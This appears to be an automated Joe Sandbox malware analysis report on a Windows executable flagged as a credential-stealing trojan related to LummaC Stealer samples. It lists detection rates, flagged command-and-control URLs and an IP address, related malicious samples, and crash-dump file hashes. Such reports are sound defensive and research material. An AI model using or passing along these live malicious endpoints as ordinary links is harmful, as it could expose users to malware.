            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            4JPKDcwtDo.exe61%ReversingLabsWin32.Trojan.GenSHCode
            4JPKDcwtDo.exe57%VirustotalBrowse
            4JPKDcwtDo.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://toppyneedus.biz/apip100%Avira URL Cloudmalware
            https://toppyneedus.biz/_100%Avira URL Cloudmalware
            https://toppyneedus.biz/api$100%Avira URL Cloudmalware
            https://toppyneedus.biz/riq100%Avira URL Cloudmalware
            https://toppyneedus.biz/9100%Avira URL Cloudmalware
            https://toppyneedus.biz/h100%Avira URL Cloudmalware

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            toppyneedus.biz
            172.67.149.66
            truefalse
              high
              impolitewearr.biz
              unknown
              unknownfalse
                high
                financialfreez.click
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://toppyneedus.biz/apifalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c04JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://duckduckgo.com/chrome_newtab4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/ac/?q=4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://toppyneedus.biz:443/api4JPKDcwtDo.exe, 00000004.00000003.1320515584.0000000002CEB000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://toppyneedus.biz/_4JPKDcwtDo.exe, 00000004.00000003.1352355984.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.invisalign.com/?utm_source=admarke4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.rootca1.amazontrust.com/rootca1.crl04JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://upx.sf.netAmcache.hve.11.drfalse
                                        high
                                        https://toppyneedus.biz/api$4JPKDcwtDo.exe, 00000004.00000002.1650981832.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://ocsp.rootca1.amazontrust.com0:4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.ecosia.org/newtab/4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://toppyneedus.biz/apip4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://toppyneedus.biz/riq4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://crl.micro4JPKDcwtDo.exe, 00000004.00000003.1352162990.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1363898461.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1401075229.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://toppyneedus.biz/pi4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.c.lencr.org/04JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.i.lencr.org/04JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?4JPKDcwtDo.exe, 00000004.00000003.1335994149.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://toppyneedus.biz/94JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349354663.0000000002CFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://toppyneedus.biz/4JPKDcwtDo.exe, 00000004.00000002.1651799702.0000000002CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/products/firefoxgro.all4JPKDcwtDo.exe, 00000004.00000003.1337357442.0000000002F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=4JPKDcwtDo.exe, 00000004.00000003.1308401458.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1308475442.0000000002D30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://toppyneedus.biz/h4JPKDcwtDo.exe, 00000004.00000002.1650981832.00000000006F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta4JPKDcwtDo.exe, 00000004.00000003.1352738637.000000000074B000.00000004.00000020.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349317494.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, 4JPKDcwtDo.exe, 00000004.00000003.1349443041.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              172.67.149.66
                                                                              toppyneedus.bizUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                              Analysis ID:1599847
                                                                              Start date and time:2025-01-26 15:47:01 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 5m 54s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:16
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:4JPKDcwtDo.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:5530e06db7d6818359bef99c53ebef57.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@2/5@3/1
                                                                              EGA Information:Failed
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 0
                                                                              • Number of non-executed functions: 1
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.45, 4.175.87.197, 40.126.32.138, 20.12.23.50
                                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target 4JPKDcwtDo.exe, PID 7120 because there are no executed function
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              TimeTypeDescription
                                                                              09:47:57API Interceptor10x Sleep call for process: 4JPKDcwtDo.exe modified
                                                                              10:58:00API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              172.67.149.66p199AjsEFs.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                VbEfsnL4cp.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  4WzIkJRbcc.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      file.dllGet hashmaliciousLummaC Stealer, MatanbuchusBrowse
                                                                                        5hNOfmF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          5hNOfmF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            I5D7Y9o1R1.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                              qaTIoEvGuA.exeGet hashmaliciousAmadey, Babadeda, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                FC0KPz6vXH.exeGet hashmaliciousAmadey, Babadeda, Credential Flusher, DarkTortilla, LummaC Stealer, StealcBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  toppyneedus.bizp199AjsEFs.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                  • 172.67.149.66
                                                                                                  VbEfsnL4cp.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                                                                                                  • 104.21.29.142
                                                                                                  grcKLMutRS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.29.142
                                                                                                  4WzIkJRbcc.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  2r81fhbT6k.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.29.142
                                                                                                  random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  UK6dGWkIJK.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.29.142
                                                                                                  gQE0KK1bN8.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                                  • 104.21.29.142
                                                                                                  file.dllGet hashmaliciousLummaC Stealer, MatanbuchusBrowse
                                                                                                  • 172.67.149.66
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUSp199AjsEFs.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                  • 172.67.149.66
                                                                                                  VbEfsnL4cp.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                                                                                                  • 104.21.29.142
                                                                                                  grcKLMutRS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.56.70
                                                                                                  4WzIkJRbcc.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  2r81fhbT6k.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.56.70
                                                                                                  ShfT0a6CFx.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                  • 104.21.31.177
                                                                                                  tZZIAvJ2Tf.exeGet hashmaliciousXWormBrowse
                                                                                                  • 104.20.3.235
                                                                                                  JOWcitzTY4.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.51.26
                                                                                                  kfThaNgKJo.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.32.1
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  a0e9f5d64349fb13191bc781f81f42e1p199AjsEFs.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                  • 172.67.149.66
                                                                                                  VbEfsnL4cp.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  2E02vIiMfd.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, VidarBrowse
                                                                                                  • 172.67.149.66
                                                                                                  grcKLMutRS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  4WzIkJRbcc.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  2r81fhbT6k.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  ShfT0a6CFx.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                  • 172.67.149.66
                                                                                                  2cYxf6R4KS.exeGet hashmaliciousLummaC, AmadeyBrowse
                                                                                                  • 172.67.149.66
                                                                                                  kfThaNgKJo.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.149.66
                                                                                                  sUaVKMWJfD.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.149.66
                                                                                                  No context
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.0283699079067659
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:cyFT8GUsnhpl7EfKQXIDcQ1c6McE7cw3NYrx+HbHg/PB6HeaOy1E45WAU6NCUtWo:d8GUr0rIx5JjG3mJIzuiFAZ24IO8iZ
                                                                                                  MD5:C1F2ADE798E9F747ECD2BDA5B8F1133E
                                                                                                  SHA1:62E1E0445FE572B521A5DFB576522855FC5CD0FF
                                                                                                  SHA-256:3E653F7A0E099054DF9A37732C037F71DA637F3B13A148DB5B1B398FFBC3BDB5
                                                                                                  SHA-512:CC7B2E9AE56F93247C24D39D0D17F555D4C6DEF58825BC39BFAC8C2E167D2C0AADDB413B7202128DCB59BD781E36781E26E4C4C7EC974BEA69224B522782A78E
                                                                                                  Malicious:true
                                                                                                  Reputation:low
                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.2.3.7.6.4.9.1.9.2.5.1.3.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.2.3.7.6.4.9.3.0.9.6.9.9.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.4.3.c.f.2.3.-.f.9.d.b.-.4.d.f.5.-.b.7.9.c.-.c.7.3.5.d.b.a.8.4.e.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.9.f.0.6.9.8.-.c.f.2.3.-.4.9.6.b.-.8.f.0.4.-.f.8.6.5.8.5.6.0.0.9.f.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.J.P.K.D.c.w.t.D.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.0.-.0.0.0.1.-.0.0.1.4.-.7.5.b.f.-.a.0.4.9.0.1.7.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.4.c.3.6.7.8.f.3.d.0.9.e.6.d.0.d.c.b.2.6.2.d.6.6.7.4.2.0.4.9.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.3.2.5.5.e.2.2.2.c.0.9.a.1.4.f.7.e.2.c.c.2.0.5.d.f.1.2.0.a.f.5.7.3.a.1.5.d.2.!.4.J.P.K.D.c.w.t.D.o...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 15 streams, Sun Jan 26 14:48:12 2025, 0x1205a4 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):48890
                                                                                                  Entropy (8bit):2.577551863525538
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ljlyXbMzY2SGKeZzeOZ1BSSnqh/LYqC5gNczif2D7/cqxl7lnuCXH1/2sLSb+:sMzY2SGKeZzZrB7EYoCrttzXVJSb+
                                                                                                  MD5:5126249BABB8639F168B5BD7DCBF5C7E
                                                                                                  SHA1:47730E341A34710AE12C00BCC85E2E5A2E3AA438
                                                                                                  SHA-256:6217260ADCD576D8E4C96AA3AFA271468582858B494006C3ED02DAA7E484D05B
                                                                                                  SHA-512:774F698B46724AADFDA6A82F033ABA92DB955F0F6654D3F257D42661A6C11FBFE31AE80626A99E41FA7C1FFE507E07486FAF3D41CE0BBB4BC1065ED600C757B2
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:MDMP..a..... .......,K.g............4...............H.......\....!......t...04..........`.......8...........T............D...z..........d"..........P$..............................................................................eJ.......$......GenuineIntel............T............K.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8324
                                                                                                  Entropy (8bit):3.6990357664182154
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:R6l7wVeJXj6Ixg6YNpSU+egmfppApDw89bgYsfNAm:R6lXJz6IW6YzSU+egmfp+gLff
                                                                                                  MD5:2B3C76D210D7BF03BC9E706ABF219C24
                                                                                                  SHA1:8C5DB74D41C7681B28ED01F161BF31B5D17A4D6A
                                                                                                  SHA-256:F8E7BCA38678D5A9EF04B871EEBFF06C0CBE8E28F2582033E6510408B0A71CE6
                                                                                                  SHA-512:24B2161F46EB51BD5EA4239A9A514BE17CBB2956CC7B7E5D6B800E36E2EF1C8DC332CFC705FC436FDC9BC4055DB3CEE434E606BCF8B41F08AD650C8568EF7BDD
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.0.<./.P.i.
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4579
                                                                                                  Entropy (8bit):4.475600652360879
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwWl8zsrJg77aI952WpW8VYcYm8M4J4YFu+q8cPHN0A0Wd:uIjfFI7DX7VYJmJytWd
                                                                                                  MD5:B540B25D56A7D2A16016B7DD663753D9
                                                                                                  SHA1:5F82550C80047567E0648000351EB82B5557D5B7
                                                                                                  SHA-256:62BB4652A8F6B9A9ADE987A6E9E37AB52D5EF86B9721AAB027A2B5AA149D9EAA
                                                                                                  SHA-512:B7B2D997672CE9AF0EDDA101AD04FB0DD88E159F4DA431FC0F290C84D6219909DE82BA0DBA6C0254408A9ACFBCFAC731B752FF8999121031EC655E13FEBF3210
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="692990" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1835008
                                                                                                  Entropy (8bit):4.416653773529352
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:hcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNp5+:+i58oSWIZBk2MM6AFB7o
                                                                                                  MD5:870F21E95D3BD9195535A694D2FADD46
                                                                                                  SHA1:280A76E6D730FC50D96F6778E979E9160D56161E
                                                                                                  SHA-256:0BAB4D81556B0CF4979197140E702400CACEBBE3652468F8D690C4706434606E
                                                                                                  SHA-512:8BF9894C66F5A70CC7D07C0B2ACB122BED9932079C7BDB0B772EF47889A77C7DE72694B9FE2533D9A5B4F0543F2E63003FB00C40C5C5B0AA96E92B9FFD8C1DA6
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&'hR.p.................................................................................................................................................................................................................................................................................................................................................f........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):6.669497053557433
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:4JPKDcwtDo.exe
                                                                                                  File size:400'384 bytes
